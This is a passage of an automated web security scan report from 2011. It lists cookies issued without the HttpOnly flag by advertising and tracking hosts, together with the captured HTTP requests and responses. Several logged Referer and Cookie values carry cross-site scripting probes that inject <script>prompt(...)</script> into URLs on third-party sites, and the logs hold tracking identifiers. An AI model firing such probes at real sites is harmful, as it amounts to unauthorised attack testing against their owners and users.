The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=q62YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 12:27:22 GMT; path=/
GUID=MTMxNTEzOTI0MjsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 12:27:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.58. http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzk5Mzg3NTg1Ni4zMDE3MjAxNAAAAAAAAAAdAAAANAAAAHcVWk7kEVpOtwEAAOgeWk7CBFpOowAAAAVSW05jUFtOcAAAAL3yWU4RwVlOoAEAAB57WE7MeVhOCgAAACC6YE6TuWBOgwEAAJP0WU7O8VlOzQEAAB0lWE52JFhOVgEAAEPgWU4D31lO/QEAAHZEWE5rRFhOdQAAAOwBWU6f+1hOCQEAAKfwWU6n8FlOsAEAAEbwWU5G8FlOVwAAACSsWU4krFlODQAAAExDWU6lQllOFQEAAPlMWU75TFlORQIAAIvwWU6L8FlOVgAAAKn7WU6m+1lOEAAAAKSLY06ki2NOrAEAAI77WU7z8FlORwAAABaaWU4WmllOvwEAADvgWU414FlO7wEAAHCiWU7DoVlOnwEAAP6zWU78s1lOqQEAABvfWU4b31lO7AEAANTYWU402FlO1AEAAIHoWU5J5llO0AEAACHoWU4h6FlOfAEAAMv1WU7L9VlOCAAAABgAAADoHlpOwgRaTiAAAAAFUltOY1BbThMAAAAgumBOk7lgTpQAAAAee1hOzHlYTkQAAADsAVlOn/tYThUAAABMQ1lOpUJZThQAAACki2NOpItjTjEAAAAWmllOFppZTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 14:31:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif?&dcsdat=1315146695527&dcssip=office.microsoft.com&dcsuri=/client/searchresults14.aspx&dcsqry=?NS=MSOUC%26VERSION=14%26LCID=1033%26SYSLCID=1033%26UILCID=1033%26AD=1%26tl=2%26Query=xss%26Scope=HP%252CHA%252CRZ%252CFX%252CXT%252CTC%252CXP%252CVA%252CDC%252CEM%252CLX&WT.tz=-5&WT.ti=Office%20Upload%20Center%202010%20Help%20-%20Office.com&WT.le=windows-1252&WT.dl=13&WT.ssl=0&WT.es=office.microsoft.com%2Fclient%2Fsearchresults14.aspx&WT.cg_n=client&WT.z_css=xss&WT.oss=xss&WT.z_locale=en-us&WT.dcsvid=b9a5a4f722f8264b834cb9d69a104d9f&WT.z_anonid=AxUFAAAAAADfBwAAPV9jhGBOQg0h7q%2BeMRxLCA!!&WT.z_rioid=200011647-8%2F28%2F2011%204%3A10%3A55&WT.vt_f_tlv=1314454453&WT.vt_f_tlh=1314456066&WT.vt_f_d=1&WT.vt_f_s=1&WT.vtvs=1315146697690&WT.vtid=22f485b698e6e3df3a31314443653874&WT.co_f=22f485b698e6e3df3a31314443653874&WT.vt_nvr1=1&WT.vt_nvr2=1&oo_source=Client&oo_app=ULC140&oo_ul=en-US&oo_offver=Office%202010&oo_assetid=CL101837057&oo_market=en-US&oo_bc=client&WT.z_searchTrig=1&WT.z_rviewTrig=1&WT.z_tbb=0&WT.z_Explicit_search=1&WT.z_searchid=1815424f-83cb-48d5-be59-44171d3795e3&WT.z_filter_evt=1&WT.z_SearchFilter=HP%2CHA%2CRZ%2CFX%2CXT%2CTC%2CXP%2CVA%2CDC%2CEM%2CLX&WT.z_OriginSubweb=Home&WT.z_OriginAssetID=CL101837057&WT.z_PageNumber=1&WT.z_PerPage=25&wtEvtSrc=office.microsoft.com%2Fclient%2Fsearchresults14.aspx HTTP/1.1
Accept: */*
Referer: http://office.microsoft.com/client/searchresults14.aspx?NS=MSOUC&VERSION=14&LCID=1033&SYSLCID=1033&UILCID=1033&AD=1&tl=2&Query=xss&Scope=HP%2CHA%2CRZ%2CFX%2CXT%2CTC%2CXP%2CVA%2CDC%2CEM%2CLX
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
X-OfApp: MSOUC
X-OfVer: 14
X-Office-Version: 14.0.5117.0
X-OfHelpLcid: 1033
X-OfUILcid: 1033
X-OfSysLcid: 1033
X-OfAppDetect: 1
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: m.webtrends.com
Proxy-Connection: Keep-Alive
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzk5Mzg3NTg1Ni4zMDE3MjAxNAAAAAAAAAAdAAAANAAAAHcVWk7kEVpOtwEAAOgeWk7CBFpOowAAAAVSW05jUFtOcAAAAL3yWU4RwVlOoAEAAB57WE7MeVhOCgAAACC6YE6TuWBOgwEAAJP0WU7O8VlOzQEAAB0lWE52JFhOVgEAAEPgWU4D31lO/QEAAHZEWE5rRFhOdQAAAOwBWU6f+1hOCQEAAKfwWU6n8FlOsAEAAEbwWU5G8FlOVwAAACSsWU4krFlODQAAAExDWU6lQllOFQEAAPlMWU75TFlORQIAAIvwWU6L8FlOVgAAAKn7WU6m+1lOEAAAALPIWU6QyFlOrAEAAI77WU7z8FlORwAAABaaWU4WmllOvwEAADvgWU414FlO7wEAAHCiWU7DoVlOnwEAAP6zWU78s1lOqQEAABvfWU4b31lO7AEAANTYWU402FlO1AEAAIHoWU5J5llO0AEAACHoWU4h6FlOfAEAAMv1WU7L9VlOCAAAABgAAADoHlpOwgRaTiAAAAAFUltOY1BbThMAAAAgumBOk7lgTpQAAAAee1hOzHlYTkQAAADsAVlOn/tYThUAAABMQ1lOpUJZThQAAACzyFlOkMhZTjEAAAAWmllOFppZTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 14:31:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzk5Mzg3NTg1Ni4zMDE3MjAxNAAAAAAAAAAdAAAANAAAAHcVWk7kEVpOtwEAAOgeWk7CBFpOowAAAAVSW05jUFtOcAAAAL3yWU4RwVlOoAEAAB57WE7MeVhOCgAAACC6YE6TuWBOgwEAAJP0WU7O8VlOzQEAAB0lWE52JFhOVgEAAEPgWU4D31lO/QEAAHZEWE5rRFhOdQAAAOwBWU6f+1hOCQEAAKfwWU6n8FlOsAEAAEbwWU5G8FlOVwAAACSsWU4krFlODQAAAExDWU6lQllOFQEAAPlMWU75TFlORQIAAIvwWU6L8FlOVgAAAKn7WU6m+1lOEAAAAKSLY06ki2NOrAEAAI77WU7z8FlORwAAABaaWU4WmllOvwEAADvgWU414FlO7wEAAHCiWU7DoVlOnwEAAP6zWU78s1lOqQEAABvfWU4b31lO7AEAANTYWU402FlO1AEAAIHoWU5J5llO0AEAACHoWU4h6FlOfAEAAMv1WU7L9VlOCAAAABgAAADoHlpOwgRaTiAAAAAFUltOY1BbThMAAAAgumBOk7lgTpQAAAAee1hOzHlYTkQAAADsAVlOn/tYThUAAABMQ1lOpUJZThQAAACki2NOpItjTjEAAAAWmllOFppZTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 14:31:00 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.59. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pluto=308875122887; domain=.fastclick.net; path=/; expires=Tue, 03-Sep-2013 12:27:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.60. http://media.techtarget.com/digitalguide/images/Editorial/mmimoso-sm.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.techtarget.com
Path:	/digitalguide/images/Editorial/mmimoso-sm.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServermedia-tt=654362634.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /digitalguide/images/Editorial/mmimoso-sm.jpg HTTP/1.1
Host: media.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538; __utma=1.1422293104.1315138449.1315138449.1315138449.2; __utmb=1.1.10.1315138449; __utmc=1; __utmz=1.1315138449.2.2.utmcsr=google.com|utmccn=(organic)|utmcmd=organic|utmctr=%22xss.cx%22

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:31 GMT
Server: Apache/2.0.63
Last-Modified: Tue, 15 Mar 2011 17:00:53 GMT
ETag: "410011e-5b4-5ef99b40"
Accept-Ranges: bytes
Content-Length: 1460
Content-Type: image/jpeg
Set-Cookie: BIGipServermedia-tt=654362634.20480.0000; path=/

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......b.K..
...[SNIP]...

10.61. http://media.techtarget.com/rms/ux/javascript/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.techtarget.com
Path:	/rms/ux/javascript/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServermedia-tt=3036792842.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rms/ux/javascript/jquery-1.3.2.min.js HTTP/1.1
Host: media.techtarget.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://users.techtarget.com/registration/searchsecurity7415e%3Cscript%3Eprompt(%22E-mail?%22)%3C/script%3Eb0b83b2839d/InlineRegister.page?type=inlineregister&callback=inlineCallback&div=inlineRegistration&pageNumber=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:24 GMT
Server: Apache/2.0.52
Last-Modified: Sat, 09 Oct 2010 21:13:33 GMT
ETag: "157c37a-dfa6-997ef940"
Accept-Ranges: bytes
Content-Length: 57254
Content-Type: application/x-javascript
Set-Cookie: BIGipServermedia-tt=3036792842.20480.0000; path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

10.62. http://nir.theregister.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nir.theregister.co.uk
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

c=1/sec.malware.4e636b47; path=/; domain=nir.theregister.co.uk; expires=Sun, 02-Oct-2011 12:12:55 GMT
a=1/119665; path=/; domain=nir.theregister.co.uk; expires=Sun, 02-Oct-2011 12:12:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?g=c&g=a&s=c/sec.malware&s=a/119665 HTTP/1.1
Host: nir.theregister.co.uk
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/08/22/skype_security_bug/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cid=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:55 GMT
Server: Apache/2.2.16 (Debian) mod_apreq2-20090110/2.8.0 mod_perl/2.0.4 Perl/v5.10.0
P3P: policyref="http://www.theregister.co.uk/Design/page/p3p/nir.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa OUR IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 47
Content-Type: application/x-javascript
Set-Cookie: c=1/sec.malware.4e636b47; path=/; domain=nir.theregister.co.uk; expires=Sun, 02-Oct-2011 12:12:55 GMT
Set-Cookie: a=1/119665; path=/; domain=nir.theregister.co.uk; expires=Sun, 02-Oct-2011 12:12:55 GMT

var VCs = ['sec.malware'];
var VSs = [119665];

10.63. http://pixel.mathtag.com/event/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1315139242; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 12:27:22 GMT
mt_mop=10008:1315139190|2:1315139242|5:1315061038|4:1313678521|10001:1312768945|10002:1313678517; domain=.mathtag.com; path=/; expires=Tue, 04-Oct-2011 12:27:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.64. http://pto.digitalriver.com/trial/646/p/kaspersky_us_storepage.962/15/content.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pto.digitalriver.com
Path:	/trial/646/p/kaspersky_us_storepage.962/15/content.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

op646kaspersky_us_storepageliid=a01603h08f2794q05t5gjbb0d; expires=Mon, 05-Sep-11 12:25:17 GMT; path=/; domain=.digitalriver.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.65. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=fbe566bc-e601-4d14-a2ef-601df1907cf9; expires=Tue, 03-Sep-2013 12:47:25 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.66. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=6981940571811189480; Domain=.turn.com; Expires=Fri, 02-Mar-2012 12:19:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.67. http://recs.richrelevance.com/rrserver/p13n_generated.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://recs.richrelevance.com
Path:	/rrserver/p13n_generated.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

catvhc=d-dc2-emYckF---%%; Expires=Fri, 22-Sep-2079 18:12:27 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rrserver/p13n_generated.js?a=c1b6edde3bea10a0&ts=1315148284608&pte=t&cn=Software&c=F&cts=http%3A%2F%2Fwww.cdw.com&pt=%7Ccategory_page&u=75165C11D5234F7D9CF742C32889F929&s=75165C11D5234F7D9CF742C32889F929&ctp=%7C0%3ARecommendedForEDC%253D00000001%2526RecoType%253DRU%2526cm_sp%253DHub-_-Session-_-Software%2526ProgramIdentifier%253D3&pref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=1 HTTP/1.1
Host: recs.richrelevance.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx?1d6ea%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Ed7742b51610=1
Cookie: uc=45911c08-7792-4fe4-9e52-a34c7997f95a; psthc=b127.-1.1313843734613.xss%00bd228%22%3E%3Cscript%3Espan.innerhtml%7C

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: catvhc=d-dc2-emYckF---%%; Expires=Fri, 22-Sep-2079 18:12:27 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Length: 677
Date: Sun, 04 Sep 2011 14:58:20 GMT

var rrRecItems=[];var rr_recs={placements:[]},rr_call_after_flush=function(){if(typeof rrRecItems !== "undefined" && rrRecItems.length && typeof getPersonalizedPrices === 'function') getPersonalizedPr
...[SNIP]...

10.68. http://reservoir.marketstudio.net/reservoir previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reservoir.marketstudio.net
Path:	/reservoir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Mon, 09-Sep-2030 00:56:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.69. http://rotation.linuxnewmedia.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rotation.linuxnewmedia.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=4aa6b1edcc28e64e54bc17d476961dba; expires=Mon, 03-Sep-2012 12:13:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=26&target=_blank&cb=80170481232&charset=ISO-8859-1&loc=http%3A//lwn.net/Articles/456878/&referer=http%3A//www.google.com/%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db HTTP/1.1
Host: rotation.linuxnewmedia.com
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:44 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=4aa6b1edcc28e64e54bc17d476961dba; expires=Mon, 03-Sep-2012 12:13:44 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Length: 1073
Content-Type: text/javascript; charset=ISO-8859-1

var OX_317908fe = '';
OX_317908fe += "<"+"script type=\'text/javascript\' src=\'http://eas.apm.emediate.eu/EAS_tag.1.0.js\'><"+"/script>\n";
OX_317908fe += "<"+"script type=\"text/javascript\" src=\"h
...[SNIP]...

10.70. http://rotation.linuxnewmedia.com/www/delivery/avw.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rotation.linuxnewmedia.com
Path:	/www/delivery/avw.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAID=4aa6b1edcc28e64e54bc17d476961dba%22; expires=Mon, 03-Sep-2012 14:02:06 GMT; path=/
OAVARS[default]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22391%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.memset.com%2F%3Fsource%3Dcloudage%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/avw.php HTTP/1.1
Host: rotation.linuxnewmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 14:02:06 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=4aa6b1edcc28e64e54bc17d476961dba%22; expires=Mon, 03-Sep-2012 14:02:06 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAVARS[default]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22391%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.memset.com%2F%3Fsource%3Dcloudage%22%3B%7D; path=/
Location: http://rotation.linuxnewmedia.com/www/delivery/ai.php?filename=728x90_leaderboard_cloud.jpg&contenttype=jpeg
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1

10.71. http://rotation.linuxnewmedia.com/www/delivery/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rotation.linuxnewmedia.com
Path:	/www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=4aa6b1edcc28e64e54bc17d476961dba%22; expires=Mon, 03-Sep-2012 14:02:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php HTTP/1.1
Host: rotation.linuxnewmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:05 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=4aa6b1edcc28e64e54bc17d476961dba%22; expires=Mon, 03-Sep-2012 14:02:05 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1

10.72. http://rotation.linuxnewmedia.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rotation.linuxnewmedia.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=4aa6b1edcc28e64e54bc17d476961dba74b8a3148352964bf6950dc; expires=Mon, 03-Sep-2012 12:13:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=364&campaignid=292&zoneid=26&channel_ids=,&loc=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&referer=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%22xss.cx%22%26pbx%3D1%26oq%3D%22xss.cx%22%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&cb=a704bb9f3b HTTP/1.1
Host: rotation.linuxnewmedia.com
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=4aa6b1edcc28e64e54bc17d476961dba; OAGEO=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:59 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=4aa6b1edcc28e64e54bc17d476961dba74b8a3148352964bf6950dc; expires=Mon, 03-Sep-2012 12:13:59 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.73. http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; Domain=.techtarget.com; Path=/
referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; Domain=.techtarget.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.74. http://sophelle.app5.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sophelle.app5.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT159=554767532.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: sophelle.app5.hubspot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
